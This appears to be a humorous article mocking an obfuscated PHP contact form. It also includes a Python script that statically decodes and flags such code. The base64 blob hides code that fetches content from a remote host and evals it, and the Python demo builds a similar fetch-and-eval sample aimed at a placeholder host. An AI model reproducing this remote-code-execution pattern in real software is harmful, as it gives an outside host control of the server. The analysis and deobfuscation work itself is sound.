Andreas C stumbled upon what might possibly be the most secure code ever written. At least, according to its original author.

The following is the content of just one of many similarly coded PHP pages...

<?PHP session_start(); $str = 'PD9waHAgc2Vzc2lvbl9zdGFydCgpOyAgDQoNCi8vL01BSUxQRVJNSU4vLy8NCmlmIChpc3NldCgkX1NFU1

NJT05bJ3o4MTJGNzA4QTE4MjYyOTJmUzY1NjlQNzY1QTc1MzE5MzV6NDg1MkU3NDhBNTgzMDI1MiddKSkgew0KICAk

X1NFU1NJT05bJ3g2MTBZNzA2QTE2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddID0gdG

ltZSgpOw0KICAkczMzMzdGNzMzQTQzMjg3NjdVNTE1NUE3NTFBNjEzMDU0OXgzODQySzczOEE0ODI5MjYyID0gDQog

ICAgYWJzKCRfU0VTU0lPTlsneDYxMFk3MDZBMTYyNjA5NGhTNDk1M1c3NDlBNTkzMDM1MVo2NDY4TDc2NEE3NDMxOD

M2J10gDQogICAgICAtICRfU0VTU0lPTlsnejgxMkY3MDhBMTgyNjI5MmZTNjU2OVA3NjVBNzUzMTkzNXo0ODUyRTc0

OEE1ODMwMjUyJ10pOyANCg0KICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1Nj

MwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0K

ICBpZiAoICgkX1NFU1NJT05bJ3MxNzIxVTcxN0EyNzI3MTgzdDI2RDcwMmExMjI2MDE5OHh5NzExVDcwN0ExNzI2MT

kzaiddID49IDIwKSAgDQogICAgICAgJiYgKCRzMzMzN0Y3MzNBNDMyODc2N1U1MTU1QTc1MUE2MTMwNTQ5eDM4NDJL

NzM4QTQ4MjkyNjIgPD0gMzAqIDYwICkpIHsNCiAgICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3

g0NjUwUzc0NkE1NjMwMDU0ID0gMzAgKiA2MCAtICR6MzIzNlQ3MzJBNDIyODY2OHU0MzQ3Wjc0M0E1MzI5NzU3eDQ2

NTBTNzQ2QTU2MzAwNTQ7DQogICAgZWNobyAieW91IGhhdmUgZXhjZWVkZWQgdGhlIG51bWJlciBvZiB0aW1lcyB5b3

UgYXJlIGFsbG93ZWQgdG8gdXNlIHRoaXMgZm9ybSA8YnI+PGJyPlBsZWFzZSB0cnkgYWdhaW4gaW4gYW4gb25lICgx

KWhvdXIgb3IgdGhyZWUoMyk8YnI+IjsNCiAgICBleGl0Ow0KICB9DQogIGVsc2VpZiAoJHMzMzM3RjczM0E0MzI4Nz

Y3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA+IDMwKiA2MCApIHsNCiAgICBzZXNzaW9uX3Vuc2V0

KCk7IA0KICAgICRfU0VTU0lPTlsnczE3MjFVNzE3QTI3MjcxODN0MjZENzAyYTEyMjYwMTk4eHk3MTFUNzA3QTE3Mj

YxOTNqJ10gPSAwOw0KICB9CQ0KfSANCmlmIChpc3NldCAoJF9TRVNTSU9OWyd5NzExVDcwN0ExNzI2MTkzalM1NzYx

VDc1N0E2NzMxMTQzWjU2NjBZNzU2QTY2MzEwNDQnXSkpIHsNCiAgJF9TRVNTSU9OWyd4NjEwWTcwNkExNjI2MDk0aF

M0OTUzVzc0OUE1OTMwMzUxWjY0NjhMNzY0QTc0MzE4MzYnXSA9IHRpbWUoKTsNCiAgJHMzMzM3RjczM0E0MzI4NzY3

VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA9IA0KICAgIGFicygkX1NFU1NJT05bJ3g2MTBZNzA2QT

E2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddIA0KICAgICAgLSAkX1NFU1NJT05bJ3k3

MTFUNzA3QTE3MjYxOTNqUzU3NjFUNzU3QTY3MzExNDNaNTY2MFk3NTZBNjYzMTA0NCddKTsNCg0KICAkejMyMzZUNz

MyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUx

NTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0KDQogIGlmICgkejMyMzZUNzMyQTQyMjg2Njh1ND

M0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID4gMikgew0KICAgICRfU0VTU0lPTlsneDIyMjZENzIyQTMy

Mjc2NzhUNjY3ME83NjZBNzYzMjAzNHkzMTM1WTczMUE0MTI4NTY5J10gPSAiIjsNCiAgfQ0KfQkJCQkJCQkJCQkJCQ

kJCQkJCQkJCQkvLy9NQUlMUEVSTUlOLy8vDQoNCiRpZF9oZCA9ICc4OEJCLTU4MjInOw0KJGlkX251bSA9ICdmZ2ho

aWprbGtsbW5vcHFyc3R2dnZ3eHd5eUJESkxOUVNVWVphWmRlZmhra21tbnBwcXN2eUFCREVGSUxRVVhYWVhXVE9JeG

tXSnluZldOSUN6dXFsZmFWUExHQXRsZmJWU09MS0lJSkxQVmFmbHJ5SFNkbXhHUGJpckFKVWd1RlEnOw0KPz4NCjw/

cGhwIA0KDQokbXlfdmFyID0gJyc7DQokcGFnZV9kYXRhID0gPDw8IFBBR0VfREFUQQ0KUEFHRV9EQVRBOw0KJFk2Mz

Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSA9IEBmb3BlbiAoImh0dHA6Ly93

d3cuc3BhbWZyZWVjb250YWN0LmNvbS9lcnIvP189NDAyJm9rPSRpZF9udW0iLCAiciIpOw0KaWYgKCEkWTYzNjdLNz

YzQTczMzE3MzdXODU4OUI3ODVBOTUzMzkxNVU5MTk1Tzc5MUExMDEzNDUxKSB7DQogIC8qIGVjaG8gIjxwPlVuYWJs

ZSB0byBvcGVuIHJlbW90ZSBmaWxlLiI7ICovIA0KICAvKiBleGl0OyAqLw0KfQ0KZWxzZSB7DQoNCiAgd2hpbGUgKC

FmZW9mKCRZNjM2N0s3NjNBNzMzMTczN1c4NTg5Qjc4NUE5NTMzOTE1VTkxOTVPNzkxQTEwMTM0NTEpKSB7DQogICAg

JFk1NTU5VTc1NUE2NTMwOTQ1dzI5MzNINzI5QTM5MjgzNzF2NDhINzA0QTE0MjYwMzk2dyAuPSBmZ2V0cyAoJFk2Mz

Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSwgMTAyNCk7DQogIH0NCiAgZXZh

bCAoJyA/PicgLiAkWTU1NTlVNzU1QTY1MzA5NDV3MjkzM0g3MjlBMzkyODM3MXY0OEg3MDRBMTQyNjAzOTZ3IC4gJz

w/cGhwICcpOw0KICBmY2xvc2UoJFk2MzY3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAx

MzQ1MSk7DQp9DQoNCmlmICgoJGdvdHRlbiA9PSAxMTEpJiYoJGhkID09ICRpZF9oZCApKSB7DQogIGluY2x1ZGUgKC

dpbml0cm9kZUdsb2JhbF9jb20ucGhwJyk7DQp9IA0KZWxzZWlmICgkZ290dGVuICE9IDExMSkgeyANCiAgaW5jbHVk

ZSAoJ2luaXRyb2RlR2xvYmFsX2NvbS5waHAnKTsNCn0gDQplbHNlaWYgKCgkZ290dGVuID09IDExMSkmJigkaGQgIT

0gJGlkX2hkICkpIHsNCiAgZWNobyAkZXJyb3JfbXNnOw0KfSANCj8+'; $str2 = base64_decode($str); /* echo '<pre>'.$str2.'</pre>'; */ /* exit(); */ eval (' ?' . '>' .$str2 . '<' . '?php ');?>

Of course, base-64 encoding was not the original coder’s only line of defense. Just in case a clever hacker gained access to the server containing the PHP code files and figured out how to decode base-64, the hacker would likely hit a wall against these impossibly long variable names in the decoded code...

///MAILPERMIN///
if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) {
  $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
  $s3337F733A4328767U5155A751A6130549x3842K738A4829262 =
    abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836']
      - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']);

  $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
  if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20)
       && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) {
    $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054;
    echo "you have exceeded the number of times you are allowed to use this form <br><br>Please try again in an one (1)hour or three(3)<br>";
    exit;
    ...
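Both layers described above (a base64 literal fed to `eval`, then machine-generated names) come off with static analysis, without running any of the PHP. The following is an added example, not code from the original article: the sample wrapper, the `example.invalid` URL, the 40-character threshold and the two review checks are assumptions made for the demonstration.

```python
import base64
import re

# "$name = '<base64>';" where the literal may be broken up by whitespace or newlines.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=\s]+)'\s*;")
RISKY = {  # generic review checks chosen for this example
    "eval of a string": re.compile(r"\beval\s*\("),
    "remote fetch via fopen": re.compile(r"fopen\s*\(\s*[\"']https?://"),
}

def unwrap(php_source):
    """Decode each base64 literal that is passed to base64_decode(); executes nothing."""
    layers = []
    for name, literal in ASSIGN.findall(php_source):
        used = re.search(r"base64_decode\s*\(\s*\$" + re.escape(name) + r"\b", php_source)
        if used:
            blob = re.sub(r"\s+", "", literal)  # undo line breaks inside the literal
            layers.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
    return layers

def rename_long_identifiers(code, min_len=40):
    """Swap machine-generated names for short aliases, numbered in first-seen order."""
    aliases = {}
    def swap(match):
        return aliases.setdefault(match.group(0), f"id{len(aliases) + 1}")
    return re.sub(r"\b\w{%d,}\b" % min_len, swap, code), aliases

def triage(code):
    """Return the labels of the RISKY patterns found in the decoded layer."""
    return sorted(label for label, rx in RISKY.items() if rx.search(code))

# Constructed sample, not the page's blob: the inner payload is encoded here
# so the demo runs offline, and the literal is split to mimic a scraped copy.
INNER = ("<?php $a1234567890B1234567890C1234567890D1234567890 = time();\n"
         "$h = @fopen(\"http://example.invalid/x\", \"r\");\n"
         "eval(' ?>' . fgets($h, 1024) . '<?php '); ?>")
_b64 = base64.b64encode(INNER.encode()).decode()
SAMPLE = ("<?PHP $str = '" + _b64[:40] + "\n\n" + _b64[40:] + "'; "
          "$str2 = base64_decode($str); eval(' ?' . '>' . $str2 . '<' . '?php ');?>")

if __name__ == "__main__":
    for layer in unwrap(SAMPLE):
        readable, aliases = rename_long_identifiers(layer)
        print(triage(layer), aliases, readable, sep="\n")
```
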

Of course, the full code is certainly worth checking out. So, hackers, go forth and decode.

As for what this super-secret-sensitive page was used for... it was a “Contact Us” form.